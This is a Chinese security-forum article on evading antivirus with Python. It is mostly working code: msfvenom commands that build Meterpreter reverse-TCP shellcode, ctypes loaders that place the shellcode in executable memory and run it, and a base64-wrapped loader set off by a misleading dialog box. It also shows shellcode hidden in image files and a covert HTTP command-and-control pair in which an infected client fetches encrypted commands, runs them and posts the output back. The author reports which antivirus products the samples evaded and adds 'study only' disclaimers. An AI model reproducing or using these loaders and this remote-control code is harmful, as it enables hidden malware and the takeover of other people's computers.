问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
python的另类免杀
安全工具
人生苦短 我用python
0x01 python优缺性 ============== python的应用领域很广,基本整个互联网都在使用它,这也得益于它丰富的第三方库,以及学习简单,成本低。 作为安全工作者更是离不开它,可以快速的写脚本工具,并且很多安全渗透工具都是以python开发的,比如我们熟知的sqlmap,OneForAll,dirsearch等等。 在免杀方面,近年来python作为后起之秀,也被杀毒软件盯得死死的,很离谱的是python写个helloworld,用pyinstaller打包,也会有杀毒软件报毒.....抛弃这个不谈,python使用pyinstaller打包的文件也很大,随便打包一个文件都有6-7m,但纵使它有这些缺点,我依旧喜欢它。 0x02 python免杀环境 =============== 首先声明我这里使用的环境: python3.8 (32位,主程序) pyinstaller (打包器) PyCharm (开发环境) kali自带msf (shellcode生成) kali自带nc (接收cmd) 0x03 免杀实践 ========= 一、对shellcode或代码加解密 ------------------ ### 1.简单的加密 首先打开kali的msf,生成shellcode ```bash msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.1.131 lport=6666 -f c ``` 将生成的shellcode复制下来,使用python处理成一段字符串: ```python test=''' "\x2f\x4f\x69\x50\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x64\x4a" "\x6b\x69\x31\x49\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x4d\x66" "\x2b\x4c\x63\x69\x67\x50\x74\x30\x6f\x6d\x4d\x63\x43\x73\x50" "\x47\x46\x38\x41\x69\x77\x67\x77\x63\x38\x4e\x41\x63\x64\x4a" "\x64\x65\x39\x53\x56\x34\x74\x53\x45\x49\x74\x43\x50\x41\x48" "\x51\x69\x30\x42\x34\x68\x63\x42\x30\x54\x41\x48\x51\x69\x31" "\x67\x67\x55\x49\x74\x49\x47\x41\x48\x54\x68\x63\x6c\x30\x50" "\x45\x6d\x4c\x4e\x49\x73\x42\x31\x6a\x48\x2f\x4d\x63\x43\x73" "\x77\x63\x38\x4e\x41\x63\x63\x34\x34\x48\x58\x30\x41\x33\x33" "\x34\x4f\x33\x30\x6b\x64\x65\x42\x59\x69\x31\x67\x6b\x41\x64" "\x4e\x6d\x69\x77\x78\x4c\x69\x31\x67\x63\x41\x64\x4f\x4c\x42" "\x49\x73\x42\x30\x49\x6c\x45\x4a\x43\x52\x62\x57\x32\x46\x5a" "\x57\x6c\x48\x2f\x34\x46\x68\x66\x57\x6f\x73\x53\x36\x59\x44" "\x2f\x2f\x2f\x39\x64\x61\x44\x4d\x79\x41\x41\x42\x6f\x64\x33" "\x4d\x79\x58\x31\x52\x6f\x54\x48\x63\x6d\x42\x34\x6e\x6f\x2f" "\x39\x43\x34\x6b\x41\x45\x41\x41\x43\x6e\x45\x56\x46\x42\x6f" "\x4b\x59\x42\x72\x41\x50\x2f\x56\x61\x67\x70\x6f\x77\x4b\x68" "\x51\x68\x47\x67\x43\x41\x42\x6f\x4b\x69\x65\x5a\x51\x55\x46" "\x42\x51\x51\x46\x42\x41\x55\x47\x6a\x71\x44\x39\x2f\x67\x2f" "\x39\x57\x58\x61\x68\x42\x57\x56\x32\x69\x5a\x70\x58\x52\x68" "\x2f\x39\x57\x46\x77\x48\x51\x4b\x2f\x30\x34\x49\x64\x65\x7a" "\x6f\x5a\x77\x41\x41\x41\x47\x6f\x41\x61\x67\x52\x57\x56\x32" "\x67\x43\x32\x63\x68\x66\x2f\x39\x57\x44\x2b\x41\x42\x2b\x4e" "\x6f\x73\x32\x61\x6b\x42\x6f\x41\x42\x41\x41\x41\x46\x5a\x71" "\x41\x47\x68\x59\x70\x46\x50\x6c\x2f\x39\x57\x54\x55\x32\x6f" "\x41\x56\x6c\x4e\x58\x61\x41\x4c\x5a\x79\x46\x2f\x2f\x31\x59" "\x50\x34\x41\x48\x30\x6f\x57\x47\x67\x41\x51\x41\x41\x41\x61" "\x67\x42\x51\x61\x41\x73\x76\x44\x7a\x44\x2f\x31\x56\x64\x6f" "\x64\x57\x35\x4e\x59\x66\x2f\x56\x58\x6c\x37\x2f\x44\x43\x51" "\x50\x68\x58\x44\x2f\x2f\x2f\x2f\x70\x6d\x2f\x2f\x2f\x2f\x77" "\x48\x44\x4b\x63\x5a\x31\x77\x63\x4f\x37\x38\x4c\x57\x69\x56" "\x6d\x6f\x41\x55\x2f\x2f\x56"; ''' print(test.replace('\n','').replace('"','').replace(';','').replace(' ','')) ``` 将生成的字符串保存。 如: ```php /OiPAAAAYInlMdJki1Iwi1IMi1IUMf+LcigPt0omMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB0TAHQi1ggUItIGAHThcl0PEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeBYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/VagpowKhQhGgCABoKieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoZwAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0oWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCQPhXD////pm////wHDKcZ1wcO78LWiVmoAU//V ``` 首先使用最基本的shellcode加载代码进行执行: 代码一: ```python import ctypes import base64 s = ''' /OiPAAAAYInlMdJki1Iwi1IMi1IUMf+LcigPt0omMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB0TAHQi1ggUItIGAHThcl0PEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeBYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/VagpowKhQhGgCABoKieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoZwAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0oWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCQPhXD////pm////wHDKcZ1wcO78LWiVmoAU//V ''' shellcode = base64.b64decode(s) rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40) ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode)) handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0) ctypes.windll.kernel32.WaitForSingleObject(handle, -1) ``` 代码二: ```python import ctypes import base64 shellcode='''/OiPAAAAYInlMdJki1Iwi1IMi1IUMf+LcigPt0omMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB0TAHQi1ggUItIGAHThcl0PEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeBYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/VagpowKhQhGgCABoKieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoZwAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0oWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCQPhXD////pm////wHDKcZ1wcO78LWiVmoAU//V ''' data=base64.b64decode(shellcode) bdata = bytearray(data) ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_int ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(bdata)), ctypes.c_int(0x3000),ctypes.c_int(0x40)) buf = (ctypes.c_char * len(bdata)).from_buffer(bdata) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(bdata))) handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1)) ``` 两者均可以上线msf。 那么此时上述两个shellcode加载器均无法达到免杀,那么根据正常的思路就是fuzz测试了,对代码进行增删,看杀毒软件主要查杀哪部分,但是使用的方式多了,效果也就变差了,我们换一种思路。 对整个代码进行base64编码,效果怎么样? ```python import base64 import win32api, win32con def test(): test = ''' aW1wb3J0IGN0eXBlcwppbXBvcnQgYmFzZTY0CnMgPSAnJycKL09pUEFBQUFZSW5sTWRKa2kxSXdpMUlNaTFJVU1mK0xjaWdQdDBvbU1jQ3NQR0Y4QWl3Z3djOE5BY2RKZGU5U1Y0dFNFSXRDUEFIUWkwQjRoY0IwVEFIUWkxZ2dVSXRJR0FIVGhjbDBQRW1MTklzQjFqSC9NY0Nzd2M4TkFjYzQ0SFgwQTMzNE8zMGtkZUJZaTFna0FkTm1pd3hMaTFnY0FkT0xCSXNCMElsRUpDUmJXMkZaV2xILzRGaGZXb3NTNllELy8vOWRhRE15QUFCb2QzTXlYMVJvVEhjbUI0bm8vOUM0a0FFQUFDbkVWRkJvS1lCckFQL1ZhZ3Bvd0toUWhHZ0NBQm9LaWVaUVVGQlFRRkJBVUdqcUQ5L2cvOVdYYWhCV1YyaVpwWFJoLzlXRndIUUsvMDRJZGV6b1p3QUFBR29BYWdSV1YyZ0MyY2hmLzlXRCtBQitOb3MyYWtCb0FCQUFBRlpxQUdoWXBGUGwvOVdUVTJvQVZsTlhhQUxaeUYvLzFZUDRBSDBvV0dnQVFBQUFhZ0JRYUFzdkR6RC8xVmRvZFc1TllmL1ZYbDcvRENRUGhYRC8vLy9wbS8vLy93SERLY1oxd2NPNzhMV2lWbW9BVS8vVgonJycKc2hlbGxjb2RlID0gYmFzZTY0LmI2NGRlY29kZShzKQpyd3hwYWdlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoMCwgbGVuKHNoZWxsY29kZSksIDB4MTAwMCwgMHg0MCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSkKaGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoMCwgMCwgcnd4cGFnZSwgMCwgMCwgMCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGhhbmRsZSwgLTEp ''' tel = win32api.MessageBox(0, "这是一个病毒,你要运行吗?", "一起来玩呀", win32con.MB_YESNOCANCEL) # 是 6 否 7 取消 2 print(tel) if tel == 7: exec(base64.b64decode(test)) elif tel == 2: dir('再见') else: dir('再见') test() ``` 上面增加了一个判断。如果选择否,则执行恶意代码,选择"取消"或者"是"则不执行代码。 免杀效果方面在(2022-7-19) 测试可过,火绒,管家,以及eset(试用版)。 360在上线5min后被查杀。 这里测试了一下微步,3/21,判断为木马,还是不太行啊,可能base64加密太简单了,那根据我上篇文章 <https://forum.butian.net/share/1580> 在这篇文章里介绍了一种加密,当时只是提供了一种思路,代码之类的没有给出,那么这次就用这个加密加强版试试 代码: ```php # -*- coding: utf-8 -*- import Tulipdecode import win32api, win32con tel = win32api.MessageBox(0, "好兄弟", "一起来玩呀", win32con.MB_YESNOCANCEL) # 是 6 否 7 取消 2 if tel == 7: dir() elif tel == 2: app = Tulipdecode.Eternal() abc = app.api_jie( sc='????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????', sjc=10947, xzys='单身的素面朝天更难吸引桃花运的注意。恋爱中的需要正视感情的问题,并积极解决。', cpuzy=42342) exec(abc) else: dir('再见') ```  那么物理机测试的话,360全家桶,火绒,管家,eset都可以过,微步测试安全,但是检测2/22,  有两个大兄弟只要是pyinstaller编译的就报毒。 github地址: <https://github.com/suansuancwk/Tulip> ### 分离加载 接着就谈谈分离免杀吧,顾名思义分离免杀就把shellcode与加载器分离,为了跟好的隐藏shellcode,我们可以将shellcode注入到图片中进行隐藏,这里写个脚本将shellcode注入到图片中,需要准备一张正常的图片,和一段shellcode。 ```shell msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.80.132 lport=6666 -f raw -o shellcode.jpg ``` 这里生成了一张包含shellcode的图片,但是什么都没有,很容易怀疑,那么我们再找张图片,将两张图片进行结合,使shellcode的图片显示为正常的图片。 这里参考小玉玉大佬的代码, [python实现的分离免杀: python实现的分离免杀 (gitee.com)](https://gitee.com/cutecuteyu/picshell_bypassav) > 这里代码路稍微改一下,并不是只有jpg可以使用,其他格式也可以。 代码如下: ```python import os def injectimage(file): if os.path.getsize("output/payload.jpg") == 0: print("原始shellcodeh获取失败,请检查源代码!") return 0 shellf = open("output/payload.jpg",'rb') shellcode = shellf.read() os.system("mv "+file+" output/"+file) psize = os.path.getsize("output/"+file) f = open("output/"+file,'ab+') f.seek(psize) f.write(shellcode) newsize = os.path.getsize("output/"+file) if newsize>psize or newsize==psize: print("图片注入成功!") return psize def genexe(file,lo): pyfile = "import os\n\ import ctypes\n\ import base64\n\ f = open('"+file+"', 'rb')\n\ size = os.path.getsize('"+file+"')\n\ f.seek("+str(lo)+")\n\ data = f.read()\n\ f.close()\n\ bdata = bytearray(data)\n\ ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_int\n\ \n\ ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(bdata)), ctypes.c_int(0x3000),\n\ ctypes.c_int(0x40))\n\ \n\ buf = (ctypes.c_char * len(bdata)).from_buffer(bdata)\n\ eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKGJkYXRhKSkp'))\n\ \n\ handle = ctypes.windll.kernel32.CreateThread(\n\ ctypes.c_int(0),\n\ ctypes.c_int(0),\n\ ctypes.c_int(ptr),\n\ ctypes.c_int(0),\n\ ctypes.c_int(0),\n\ ctypes.pointer(ctypes.c_int(0)))\n\ \n\ ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))\n\ " af = open("payload.py",'w') af.write(pyfile) # os.system("pyinstaller -F payload.py") if __name__ == '__main__': targetfile = input("请输入图片的路径 :") if targetfile == '': print("你没有选择一张图片,将默认使用整个shellcode转换成图片") os.system("touch demo.png") targetfile = "demo.png" location = injectimage(targetfile) genexe(targetfile,location) ``` 改了一点,这里按照上面生成的效果如下:  运行可以上线,但是吗,免杀可能稍微不太行了,时间太久了,先不管shellcode加载器,单单看看shellcode图片,这是原始直接生成的, :  这里换成base64加密的shllcode图片, ```shell msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.80.132 lport=6666 -f raw -o shellcode.jpg ```  效果相对较好了,那么相应的就需要修改代码了,增加一句base64解密就行了 ```python import os import ctypes import base64 f = open('tx.jpg', 'rb') size = os.path.getsize('tx.jpg') f.seek(67558) data = f.read() f.close() data=base64.b64decode(data) bdata = bytearray(data) ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_int ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(bdata)), ctypes.c_int(0x3000),ctypes.c_int(0x40)) buf = (ctypes.c_char * len(bdata)).from_buffer(bdata) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(bdata))) handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1)) ``` 另外一种加载器的写法如下: ```python import os import ctypes import base64 f = open('tx.jpg', 'rb') size = os.path.getsize('tx.jpg') f.seek(67558) data = f.read() f.close() shellcode = base64.b64decode(data) rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40) ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode)) handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0) ctypes.windll.kernel32.WaitForSingleObject(handle, -1) ``` 以上代码均可以上线。 接下开就是打包了,但是这样免杀成功率未知,可以将上面代码全部加密,加密的方法参考前面。 免杀性就不测试了,由于环境原因,大家可以进行测试,应该不会太差。 远程分离加载就比较简单了,简单就是将包含shellcode或者直接将shellcode放到互联网或者可以获取到的地方,比如图片就可以放到图上,shellcode进行加密放到互联网上等等 将上面的代码或者图片request下来就可以了,原理差不对。 ### "借刀杀人" 这种方法不建议真实测试,仅供学习参考.... 假如我们将直接使用python的system函数执行命令,不使用cs或者msf,达到远控的目的,类似于webshell,这样我们就可以将需要执行的命令放到互联网上,且回显的命令也可以返回到互联网上,可以使用request请求,中间需要心跳时间,多久request一次。简单结构图如下:  上述是使用两台媒介靶机,也可以使用一台,接收与发送都是同一个媒介,但是相对了两台媒介效果好些 这里我不使用真实网站测试,使用本地环境测试。 > 以下内容均虚拟环境,请勿在真实环境下进行!!!! 一个正常的html页面:  一个php文件,在phpstudy下搭建: ```php <?php header("content-type:text/html;charset=utf-8"); if(isset($_COOKIE['id'])&& isset($_COOKIE['time']) && isset($_POST['data']) ){ $id=$_COOKIE['id']; $time=$_COOKIE['time']; $data=$_POST['data']; $myfile = fopen("log.txt", "w") or die("Unable to open file!"); $txt = $data.",".$id.",".$time; fwrite($myfile, $txt); fclose($myfile); } ?> ``` 控制端python代码: ```python import os import sys import time import lljiam import lljiem def getdata(): with open('index1.html', 'r', encoding='utf8') as f: data = f.read() f.close() # print(data) return data def fsml(data): ml = input('执行命令>>>') app = lljiam.Eternal() test = app.api_jia('2', ml, zfc='suansuan') # 密文 cpu 时间戳 # print(test) html = data.format(time=test[2], cpu=test[1], ml=test[0]) with open('index.html', 'w') as f: f.write(html) f.close() if ml == 'exit()': sys.exit(0) # fsml(getdata()) def readhx(): with open('log.txt', 'r') as f: jg = f.read() f.close() jg = jg.split(',') data = jg[0] cpu = jg[1] time1 = jg[2] app = lljiem.Eternal() ml = app.api_jie(sc=data, sjc=time1, xzys='suansuanadmin', cpuzy=cpu) print(ml) os.remove("log.txt") # readhx() def ks(): while True: data = getdata() fsml(data) pd() time.sleep(2) def pd(): while 1: if not os.path.exists('log.txt'): time.sleep(1) else: readhx() break ks() ``` 被控端代码: ```python import os import sys import time import lljiem import requests import lljiam def klj_eval(ml): try: result = os.popen(ml,'r').read() except: result = '出错了' # print(result) return result def getml(): html = requests.get(url='http://192.168.80.1:8000').text ml = html.split('<!--t')[1].split('t-->')[0] sjc = html.split('<!--l')[1].split('l-->')[0] cpu = html.split('<!--f')[1].split('f-->')[0] # print(ml) # print(sjc) # print(cpu) app = lljiem.Eternal() ml = app.api_jie(sc=ml, sjc=sjc, xzys='suansuan', cpuzy=cpu) return ml, sjc def fshx(hx): ml = hx app = lljiam.Eternal() test = app.api_jia('2', ml, zfc='suansuanadmin') # 密文 cpu 时间戳 headers = { "cookie": "id=" + str(test[1]) + ';' + 'time=' + str(test[2]) } data = { "data": test[0] } requests.post(url='http://127.0.0.1:86/cookie.php', data=data, headers=headers) # fshx(klj_eval(getml())) def ks(): sjc1 = 0 while True: time.sleep(2) mls = getml() ml = mls[0] if ml == 'exit()': sys.exit(0) else: if sjc1 != mls[1]: hx = klj_eval(ml) fshx(hx) sjc1 = mls[1] else: pass time.sleep(60) ks() ``` 另外两个py文件(lljiam,lljiem)是上述加密代码更改版,将爱心替换成了英文字母。 并且上述被控端存在一个心跳时间也就是60s。 上面环境以及代码稍后放到github,仅供参考学习,其他与本人无关:   上述代码比较简单,原理就是,通过一个中间的服务器作为媒介,接收命令,并且获取命令回显结果,这个是在本地搭建,那么假如我在本地搭建一个cms程序,注册用户登录,在个人简介里输入加密后的命令,让客户端get下来,在由客户端解密,并将执行命令的结果加入到图片里,post到图床,控制端再get下来,结果怎么样呢? 这里仅本地演示,更多的利用方式各位师傅自己探索,大致流程图在上述的图片里。 github地址: [suansuancwk/http\_bypssAV: http另类的免杀,仅供学习参考!!! (github.com)](https://github.com/suansuancwk/http_bypssAV) 0x04 总结 ======= 最后的一个项目其实还不太完整,有很多需要优化的地方,当然这里只是提供一种思路,一种学习的思路,不要用该项目做非法测试!!!! 这里的python吗,免杀代码较多,且繁琐,后续将会发布python的一行代码免杀,代码则相对来说较少,采用的则主要是分离免杀,搞文章主要是扩展思路。 感谢给位师傅阅读。
发表于 2022-08-05 09:55:36
阅读 ( 9103 )
分类:
安全开发
4 推荐
收藏
2 条评论
Passw0rd
2022-08-14 13:19
大佬,Tulipencode.py里面有个suoying包可以分享一下吗
请先
登录
后评论
Passw0rd
2022-08-14 13:22
不好意思,大佬发了,刚看到
请先
登录
后评论
请先
登录
后评论
suansuan
4 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!
